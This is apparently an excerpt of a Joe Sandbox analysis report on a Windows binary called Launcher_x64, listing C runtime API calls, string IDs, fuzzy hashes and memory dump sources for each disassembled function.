                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 1170836740-1018135373
                                                                                          • Opcode ID: a50e96063a7a32610a96aada5172f8ce247016b681aaeaf844048760dd7a47af
                                                                                          • Instruction ID: 3b3b2a0a53eeed51e44078616cf7293e44cf32aa857e983f8c8a60b6df6d6164
                                                                                          • Opcode Fuzzy Hash: a50e96063a7a32610a96aada5172f8ce247016b681aaeaf844048760dd7a47af
                                                                                          • Instruction Fuzzy Hash: 1041B238A002189BCF10EF6CD885A9E7BA1EF45324F198155E859AB352D771EA01CFB2
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00D76751,00000000,00000000,00000000,00000000), ref: 00D76703
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 3664257935-537541572
                                                                                          • Opcode ID: 06dbf40251e1e05748ae9434eb6b76d9ec3a5aabe61c25e758c4bc0d71940ebc
                                                                                          • Instruction ID: 8fea9fe6ccce4fed1752232999deaddf95b6b9aee658ad4e0435180fc54c4167
                                                                                          • Opcode Fuzzy Hash: 06dbf40251e1e05748ae9434eb6b76d9ec3a5aabe61c25e758c4bc0d71940ebc
                                                                                          • Instruction Fuzzy Hash: 26210276A01B25ABC732AB24DC44A5E3368EB417A0F694165FD09E7290FB70ED00DBF0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6fbe3d61d9c76832891ff93ecd83829f43f9c31fadd32656efcf6489f2fb2ff0
                                                                                          • Instruction ID: 611d60a1b236edbc5d0d9e650fde31abdce939d2bd48a4ca5f400ba2e4f4b500
                                                                                          • Opcode Fuzzy Hash: 6fbe3d61d9c76832891ff93ecd83829f43f9c31fadd32656efcf6489f2fb2ff0
                                                                                          • Instruction Fuzzy Hash: FCB10370A04349AFEB11EFA9C881BBEBBB5FF45B10F184258E51997392D7709A41CB70
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00D74464,00D6A97D,00D69BD4), ref: 00D7447B
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D74489
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D744A2
                                                                                          • SetLastError.KERNEL32(00000000,00D74464,00D6A97D,00D69BD4), ref: 00D744F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 5f01d3e6689b96477237c2ec5e82e6e067a95666a1bc332b0e601c6bc4f3a67f
                                                                                          • Instruction ID: 27668c365a16668fd51b1610f9fa088bc9c2a33a7cfb00d193f4ff9394e57a4f
                                                                                          • Opcode Fuzzy Hash: 5f01d3e6689b96477237c2ec5e82e6e067a95666a1bc332b0e601c6bc4f3a67f
                                                                                          • Instruction Fuzzy Hash: F101883210A3116EF7262779BC85A6B2B94EB41778B28833AF518951F5FF914C01A670
                                                                                          APIs
                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00D74E6B
                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00D750E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                          • String ID: csm$csm$csm
                                                                                          • API String ID: 2673424686-393685449
                                                                                          • Opcode ID: aa79965707f20ab5208506f4bddb84597247b5257e2b50efbbab2174bade718f
                                                                                          • Instruction ID: 07c35343a6df0caaca8df01867173df263c8bc8a7e0d0462df5e49a4ef2817ee
                                                                                          • Opcode Fuzzy Hash: aa79965707f20ab5208506f4bddb84597247b5257e2b50efbbab2174bade718f
                                                                                          • Instruction Fuzzy Hash: FCB17C31800219EFCF16DF94D8419AEB7B5FF04310B18855AF9186B216E7B1DA61CFB2
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00D85684,000000FF,?,00D6F2B9,00D6F1A0,?,00D6F355,00000000), ref: 00D6F22D
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,00D85684,000000FF,?,00D6F2B9,00D6F1A0,?,00D6F355,00000000), ref: 00D6F23F
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D85684,000000FF,?,00D6F2B9,00D6F1A0,?,00D6F355,00000000), ref: 00D6F261
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: e63fedd86e2b76e82106d09fc20f444a364ce4514752a478c53925be17ee4a0c
                                                                                          • Instruction ID: 450ec39a652cd495261d9672dc95dbe26bc31b3cbf07e6615cf0ff5d58ce8e43
                                                                                          • Opcode Fuzzy Hash: e63fedd86e2b76e82106d09fc20f444a364ce4514752a478c53925be17ee4a0c
                                                                                          • Instruction Fuzzy Hash: 12018F35964669EFDB019B50EC0ABAEBBB8FB44B15F040625E811E23D0DB749904CFA0
                                                                                          APIs
                                                                                          • __alloca_probe_16.LIBCMT ref: 00D76EAF
                                                                                          • __alloca_probe_16.LIBCMT ref: 00D76F78
                                                                                          • __freea.LIBCMT ref: 00D76FDF
                                                                                            • Part of subcall function 00D756F1: HeapAlloc.KERNEL32(00000000,00D77675,?,?,00D77675,00000220,?,?,?), ref: 00D75723
                                                                                          • __freea.LIBCMT ref: 00D76FF2
                                                                                          • __freea.LIBCMT ref: 00D76FFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1096550386-0
                                                                                          • Opcode ID: d1bc91e7a264ae00e751d288437c385de5adcb372fdbc722624730b76de374c3
                                                                                          • Instruction ID: cde01a86448bb64052969109a29847d4c287507c2000c9e06a044bb4961f635d
                                                                                          • Opcode Fuzzy Hash: d1bc91e7a264ae00e751d288437c385de5adcb372fdbc722624730b76de374c3
                                                                                          • Instruction Fuzzy Hash: 2051C172600A56AFEB219F64EC81EFBBAA9EF44754B198439FD0CD6150FB71DC1086B0
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 00D677F9
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00D67804
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00D67872
                                                                                            • Part of subcall function 00D676EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D67707
                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 00D6781F
                                                                                          • _Yarn.LIBCPMT ref: 00D67835
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                          • String ID:
                                                                                          • API String ID: 1088826258-0
                                                                                          • Opcode ID: cae97618439fcc1a3ebf9be16cf1e0962fbee6e26498ccbc166a95722a759bd0
                                                                                          • Instruction ID: ff328a141bef2c07463cd1d96ba741a74c40fe001eb9a12c0d9c46b7d841cd57
                                                                                          • Opcode Fuzzy Hash: cae97618439fcc1a3ebf9be16cf1e0962fbee6e26498ccbc166a95722a759bd0
                                                                                          • Instruction Fuzzy Hash: AC01BC79A046159BCB06EF20D84A97C7B76FF90354B09004AE80297381DF34AE02CFB1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: FreeConsole$kernel32.dll
                                                                                          • API String ID: 1646373207-2564406000
                                                                                          • Opcode ID: 41eeb3a2837fc048ffea5526fb74a231e7d981a3d8609d9e8bb66cb909722715
                                                                                          • Instruction ID: baff1fb42717a0f2906c4aba6ad6156d9f4b886ec8448bace1d34544f7acb431
                                                                                          • Opcode Fuzzy Hash: 41eeb3a2837fc048ffea5526fb74a231e7d981a3d8609d9e8bb66cb909722715
                                                                                          • Instruction Fuzzy Hash: 5B016670E14208AFCB40EFB8D94569DBBF4EB48300F41856AE849D7351EB34A6548FA2
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D7F74C,00000000,?,00D91E20,?,?,?,00D7F683,00000004,InitializeCriticalSectionEx,00D890D4,00D890DC), ref: 00D7F6BD
                                                                                          • GetLastError.KERNEL32(?,00D7F74C,00000000,?,00D91E20,?,?,?,00D7F683,00000004,InitializeCriticalSectionEx,00D890D4,00D890DC,00000000,?,00D7539C), ref: 00D7F6C7
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D7F6EF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 3177248105-2084034818
                                                                                          • Opcode ID: 4b6b66efdaef552814493662018621db916e351e4a95182b50e4c1508b8ff498
                                                                                          • Instruction ID: 9649057d55f4aa738aeba20f2f7053ce65688110d35b410fc931d5824f72fe93
                                                                                          • Opcode Fuzzy Hash: 4b6b66efdaef552814493662018621db916e351e4a95182b50e4c1508b8ff498
                                                                                          • Instruction Fuzzy Hash: 27E01230250305BAEB312B61EC0AB5C3B949B00B51F244430F90CE81A0FBA299509EB5
                                                                                          APIs
                                                                                          • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00D7D7B1
                                                                                            • Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D7DA03
                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D7DA49
                                                                                          • GetLastError.KERNEL32 ref: 00D7DAEC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                          • String ID:
                                                                                          • API String ID: 2112829910-0
                                                                                          • Opcode ID: 31c7f4c0adcb32c62f68f583b6b5b81c58c002ca9f1d1de5e0a465e81d617471
                                                                                          • Instruction ID: 6b0872a12a3c1cfdac55e332845d70aeb28ba51a8759c91ad726652ece449012
                                                                                          • Opcode Fuzzy Hash: 31c7f4c0adcb32c62f68f583b6b5b81c58c002ca9f1d1de5e0a465e81d617471
                                                                                          • Instruction Fuzzy Hash: F9D16B75D042589FCF15CFA8C8809ADBBB6FF49314F28816AE45AEB351E730A941CB60
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPointer
                                                                                          • String ID:
                                                                                          • API String ID: 1740715915-0
                                                                                          • Opcode ID: 848afbc038789c983303edabf5c9d1e30fb8589e26ef94b0d315bef32108477d
                                                                                          • Instruction ID: bfa667a247651479553afdf958c157f4aa9a4968cd26a6be25c50837e22a2b81
                                                                                          • Opcode Fuzzy Hash: 848afbc038789c983303edabf5c9d1e30fb8589e26ef94b0d315bef32108477d
                                                                                          • Instruction Fuzzy Hash: CA51E1726052069FDB2A9F14D881BBAB7A8EF00311F28852DE94D57291F731EC40CBB0
                                                                                          APIs
                                                                                            • Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862
                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D7B5DA
                                                                                          • __dosmaperr.LIBCMT ref: 00D7B5E1
                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D7B61B
                                                                                          • __dosmaperr.LIBCMT ref: 00D7B622
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1913693674-0
                                                                                          • Opcode ID: 8eb4edbe76670798437dfbf930815999119a8a0f2cbb98fb73e2dabb95d2fb38
                                                                                          • Instruction ID: d4b44ea25cc552eb20b3df6f088d9fcb9b0824aeefc29bb11e34a425429153d1
                                                                                          • Opcode Fuzzy Hash: 8eb4edbe76670798437dfbf930815999119a8a0f2cbb98fb73e2dabb95d2fb38
                                                                                          • Instruction Fuzzy Hash: 2A218B71600609AFDB20AF66C881AAFB7A9EF45374714C51AF95DDB650F731EC408BB0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d30bc071266a8cad1919b614ec4cdf2d44186c2b649272c0e64d176e2285040d
                                                                                          • Instruction ID: a811b07d9530e115a03181b21f363b3c03ba9f0b37973264c242461864e21def
                                                                                          • Opcode Fuzzy Hash: d30bc071266a8cad1919b614ec4cdf2d44186c2b649272c0e64d176e2285040d
                                                                                          • Instruction Fuzzy Hash: 9C21C032220209AFDB21EFB5DC8197A77A8EF403687149619F899C7650F730EC40DBB0
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00D7C976
                                                                                            • Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7C9AE
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7C9CE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 158306478-0
                                                                                          • Opcode ID: efdfedf52bd4613d66a63f38b7bec25803f9a663167261b5747ed27ccc97e587
                                                                                          • Instruction ID: e6265269a883aea9115264ad3c363539889014eab3446e5dbe2a423df1cd5f94
                                                                                          • Opcode Fuzzy Hash: efdfedf52bd4613d66a63f38b7bec25803f9a663167261b5747ed27ccc97e587
                                                                                          • Instruction Fuzzy Hash: 1D1126F29216097F6B1167766C8DC7F6AACDF843D53908018F90DD1200FB70CD008AB2
                                                                                          APIs
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000), ref: 00D844A7
                                                                                          • GetLastError.KERNEL32(?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?,?,?,00D7D486,?), ref: 00D844B3
                                                                                            • Part of subcall function 00D84510: CloseHandle.KERNEL32(FFFFFFFE,00D844C3,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?,?), ref: 00D84520
                                                                                          • ___initconout.LIBCMT ref: 00D844C3
                                                                                            • Part of subcall function 00D844E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D84481,00D839CC,?,?,00D7DB40,?,00000000,00000000,?), ref: 00D844F8
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?), ref: 00D844D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                          • String ID:
                                                                                          • API String ID: 2744216297-0
                                                                                          • Opcode ID: 8a48b0bb40f6d25b78cd578845cde7adcf9e030f59df84cf40782a228af6da3a
                                                                                          • Instruction ID: 255697b9578e0053e714db808193c1074dad779bc5115dae3d3d3dd2f230679c
                                                                                          • Opcode Fuzzy Hash: 8a48b0bb40f6d25b78cd578845cde7adcf9e030f59df84cf40782a228af6da3a
                                                                                          • Instruction Fuzzy Hash: A8F0303A011226BBCF223FD5EC09A8E3F26FB493B0B054450FA18C5230D67288209FB4
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D6A347
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00D6A356
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00D6A35F
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00D6A36C
                                                                                          Memory Dump Source
